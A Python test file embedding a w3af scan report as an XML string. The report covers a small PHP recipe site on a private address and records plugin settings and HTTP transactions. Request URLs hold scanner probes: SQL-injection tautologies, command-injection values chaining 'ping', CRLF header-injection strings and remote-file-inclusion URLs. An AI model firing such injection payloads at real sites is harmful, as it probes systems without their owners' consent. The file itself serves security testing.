# -*- coding: UTF-8 -*-
report_medium = r"""<w3afrun start="1432110868" startstr="Wed May 20 10:34:28 2015" xmloutputversion="2.0">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.46
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scaninfo target="http://10.12.68.43:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js">
                <config parameter="secure_js_file" value="w3af/plugins/grep/cross_domain_js/secure-js-sources.txt"/>
            </plugin>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scaninfo>
    <vulnerability id="[514, 522, 525, 527, 16, 534, 535, 539, 541, 542, 543, 544, 545, 547, 548, 40, 555, 556, 46, 861, 563, 53, 56, 57, 59, 62, 64, 65, 68, 70, 71, 75, 782, 598, 91, 731, 97, 98, 101, 105, 583, 108, 110, 787, 873, 618, 131, 647, 137, 662, 757, 675, 682, 683, 685, 174, 690, 697, 711, 712, 202, 203, 204, 205, 206, 207, 720, 723, 724, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 232, 233, 235, 236, 237, 238, 751, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 253, 766, 768, 258, 771, 260, 268, 270, 271, 742, 643, 815, 730, 798, 802, 291, 292, 294, 295, 296, 298, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 316, 318, 319, 320, 322, 323, 328, 329, 330, 331, 332, 744, 334, 335, 336, 337, 338, 339, 340, 343, 344, 345, 346, 347, 349, 350, 352, 353, 355, 356, 357, 358, 361, 363, 364, 365, 366, 369, 371, 372, 373, 376, 831, 381, 385, 387, 389, 748, 835, 406, 752, 423, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 436, 437, 439, 440, 441, 442, 444, 445, 447, 448, 449, 450, 453, 454, 455, 456, 460, 463, 465, 468, 847, 479, 489, 850, 765, 504, 818, 509]" method="GET" name="Strange header" plugin="strange_headers" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The remote web server sent 215 HTTP responses with the uncommon response header &quot;host&quot;, one of the received header values is &quot;10.12.68.43:31337&quot;. The first ten URLs which sent the uncommon header are:
 - http://10.12.68.43:31337/%22
 - http://10.12.68.43:31337/cake.inc
 - http://10.12.68.43:31337/75+AND+75%3D76+
 - http://10.12.68.43:31337/%7Cping+-n+4+localhost
 - http://10.12.68.43:31337/59%27+OR+%2759%27%3D%2759
 - http://10.12.68.43:31337/cake.bak
 - http://10.12.68.43:31337/cake.bzip2
 - http://10.12.68.43:31337/choucroute.bak1
 - http://10.12.68.43:31337/De1k3Ngp
 - http://10.12.68.43:31337/6bBCX4LD
</description>
        <http-transactions>
            <http-transaction id="514">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42%27+OR+%2742%27%3D%2742 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42%27+OR+%2742%27%3D%2742 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42%27+OR+%2742%27%3D%2742'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="522">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42%27+AND+%2742%27%3D%2743 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42%27+AND+%2742%27%3D%2743 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42%27+AND+%2742%27%3D%2743'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="525">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="527">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about iDontExist has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='iDontExist'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="534">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0D%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0D%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70+OR+70%3D70+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70+OR+70%3D70+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70+OR+70%3D70+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="539">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="542">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="543">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="544">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="545">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Dvulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Dvulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="547">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="548">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="40">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=6zGKQ64 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="555">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="556">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70+AND+70%3D71+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70+AND+70%3D71+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70+AND+70%3D71+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="46">
                <httprequest>
                    <status>PUT http://10.12.68.43:31337/uszzY HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">lPRhA7</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
